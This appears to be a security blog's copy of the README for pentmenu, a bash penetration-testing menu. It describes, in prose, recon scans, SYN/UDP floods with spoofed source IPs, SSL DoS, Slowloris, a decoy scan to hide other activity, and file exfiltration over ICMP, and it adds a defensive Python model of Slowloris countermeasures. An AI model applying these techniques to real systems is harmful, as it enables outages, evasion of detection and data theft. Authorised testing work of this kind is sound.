Alternatively, use git clone, or download the latest release from https://github.com/GinjaChris/pentmenu/releases, extract it and run the script.

More detail
RECON MODULES
  • Show IP - uses curl to perform a lookup of your external IP. Runs ip a or ifconfig (as appropriate) to show local interface IPs.
  • DNS Recon - passive recon, performs a DNS lookup (forward or reverse as appropriate for target input) and a whois lookup of the target. If whois is not available it will perform a lookup against ipinfo.io (only works for IPs, not hostnames).
  • Ping Sweep - uses nmap to perform an ICMP echo (ping) against the target host or network.
  • Network Recon - uses nmap to identify live hosts and open ports, attempts OS identification, and grabs banners/identifies running software versions. Nmap will not perform a ping sweep beforehand as part of this scan. Nmap's default User-Agent string is changed to that of IE11 in this mode, to help avoid detection via HTTP. This scan can take a long time to finish, please be patient.
  • Stealth Scan - TCP Port scanner using nmap to scan for open ports using TCP SYN scan. Nmap will not perform a ping sweep prior to performing the TCP SYN scan. This scan can take a long time to finish, please be patient.
  • UDP scan - uses nmap to scan for open UDP ports.
  • Check Server Uptime - estimates the uptime of the target by querying an open TCP port with hping. Accuracy of the results varies from one machine to another.
DOS MODULES
  • TCP Syn Flood - sends a flood of TCP SYN packets using hping3. If hping3 is not found, it attempts to use the nmap-nping utility instead. Hping3 is preferred since it sends packets as fast as possible. Options are provided to use the source IP of your interface, or specify (spoof) a source IP, or spoof a random source IP for each packet. Optionally, you can add data to the SYN packet. All SYN packets have the fragmentation bit set and use hping's virtual MTU of 16 bytes, guaranteeing fragmentation. Falling back to nmap-nping means sending X packets per second until Y packets have been sent, and only allows the use of the interface IP or a specified (spoofed) source IP.
    A TCP SYN flood is unlikely to break a server, but is a good way to test switch/router/firewall infrastructure and state tables. 
  • UDP Flood - much like the TCP SYN Flood but instead sends UDP packets to the specified host:port. Like the TCP SYN Flood function, hping3 is used but if it is not found, it attempts to use nmap-nping instead. All options are the same as TCP SYN Flood, except you can specify data to send in the UDP packets. Again, this is a good way to check switch/router throughput or to test VOIP systems.
  • SSL DOS - uses OpenSSL to attempt to DOS a target host:port. It does this by opening many connections and causing the server to make expensive handshake calculations. This is not a pretty or elegant piece of code, do not expect it to stop immediately upon pressing 'Ctrl c', but it can be brutally effective. 
    The option for client renegotiation is given; if the target server supports client initiated renegotiation, this option should be chosen. Even if the target server does not support client renegotiation (for example CVE-2011-1473), it is still possible to impact/DOS the server with this attack. 
    It is very useful to run this against loadbalancers/proxies/SSL-enabled servers (not just HTTPS!) to see how they cope under the strain. 
  • Slowloris - uses netcat to slowly send HTTP Headers to the target host:port with the intention of starving it of resources. This is effective against many, although not all, HTTP servers, provided the connections can be held open for long enough. Therefore this attack is only effective if the server does not limit the time available to send a complete HTTP request. Some implementations of this attack use clearly identifiable headers which is not the case here. The number of connections to open to the target is configurable. The interval between sending each header line is configurable, with the default being a random value between 5 and 15 seconds. The idea is to send headers slowly, but not so slow that the servers idle timeout closes the connection. The option to use SSL (SSL/TLS) is given, which requires stunnel.
Defences against this attack include (but are not limited to):
Limiting the number of TCP connections per client; this will prevent a single machine from making the server unavailable, but is not effective if say, 10,000 clients launch the attack simultaneously. Additionally, such a defensive measure may negatively impact multiple (legitimate) clients operating behind a forward proxy server.
Limiting the time available to send a complete HTTP request; this is effective since the attack relies on slowly sending headers to the server (the server should await all headers from the client before responding). If the server limits the time for receiving all headers of a request to 10 seconds (for example) it will severely limit the effectiveness of the attack. It is possible that such a measure will prevent legitimate clients over slow/lossy connections from accessing the site.
  • Distraction Scan - this is not really a DOS attack but simply launches multiple TCP SYN scans, using hping, from a spoofed IP of your choosing (such as the IP of your worst enemy). It is designed to be an obvious scan in order to trigger any IDS/IPS the target may have and so hopefully obscure any actual scan or other action that you may be carrying out.
EXTRACTION MODULES
  • File extraction via ICMP - This module uses hping to send data with ICMP packets. It can be extremely useful where only ICMP connectivity is possible.
  • File receipt via ICMP - This module uses hping to listen for ICMP packets and record the data to an output file of your choice. It will only record packet data starting with the secret that you define. Therefore the extractor and receiver must use an identical secret.
An alternative to using this receiver is to run Wireshark to capture the inbound ICMP packets; it seems quite happy to reconstruct the data received over several fragmented ICMP packets.
  • Listener - uses netcat to open a listener on a configurable TCP or UDP port. This can be useful for testing syslog connectivity, receiving files or checking for active scanning on the network. Anything received by the listener is written out to ./pentmenu.listener.out.
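The two Slowloris defences discussed under the DOS modules above (a per-client connection cap and a deadline for receiving the complete request headers), modelled in Python as an added example that is not part of pentmenu. Timestamps are passed in explicitly so the logic is deterministic; the client addresses and limits are constructed values.

```python
from collections import Counter


class SlowHeaderGuard:
    """Admission and reaping logic a server front-end could apply against slow-header clients."""

    def __init__(self, max_conns_per_client=10, header_timeout=10.0):
        self.max_conns_per_client = max_conns_per_client   # defence 1: cap per client address
        self.header_timeout = header_timeout               # defence 2: seconds allowed for full headers
        self._conns = {}            # conn_id -> {"client": ip, "opened": t, "headers_done": bool}
        self._per_client = Counter()

    def accept(self, conn_id, client, now):
        """Return True if the connection is admitted; False if the client is over its cap."""
        if self._per_client[client] >= self.max_conns_per_client:
            return False
        self._conns[conn_id] = {"client": client, "opened": now, "headers_done": False}
        self._per_client[client] += 1
        return True

    def headers_complete(self, conn_id):
        """Mark that the blank line ending the request headers has arrived."""
        if conn_id in self._conns:
            self._conns[conn_id]["headers_done"] = True

    def close(self, conn_id):
        info = self._conns.pop(conn_id, None)
        if info:
            self._per_client[info["client"]] -= 1

    def reap(self, now):
        """Drop every connection still waiting for headers past the timeout; return their ids."""
        stale = [cid for cid, info in self._conns.items()
                 if not info["headers_done"] and now - info["opened"] > self.header_timeout]
        for cid in stale:
            self.close(cid)
        return stale

    def open_connections(self, client):
        return self._per_client[client]


def simulate_slow_client(guard, client="198.51.100.7", attempts=12, start=0.0):
    """Constructed scenario: one client opens many connections and never finishes its headers.

    Returns the ids of the connections the guard admitted.
    """
    return [cid for cid in range(attempts) if guard.accept(f"{client}#{cid}", client, start)]


if __name__ == "__main__":
    guard = SlowHeaderGuard(max_conns_per_client=10, header_timeout=10.0)
    admitted = simulate_slow_client(guard)
    print(f"admitted {len(admitted)} of 12 connections from one client")
    guard.headers_complete("198.51.100.7#0")            # one of them finishes like a real browser
    print("reaped at t=5s:", guard.reap(now=5.0))       # nothing yet: still inside the window
    print("reaped at t=11s:", len(guard.reap(now=11.0)), "stale connections")
    print("open after reaping:", guard.open_connections("198.51.100.7"))
```

The trade-offs the text names still apply: the cap hits legitimate users behind one forward proxy, and the header deadline hits clients on slow or lossy links.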

Disclaimer
This script is only for responsible, authorised use. You are responsible for your own actions and this script is provided without warranty or guarantee of any kind. The author(s) accept no responsibility or liability on your behalf.

Also see
Pentmenu is available as a package on Arch Linux. Big love to ArchStrike and Parrot Linux.


Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.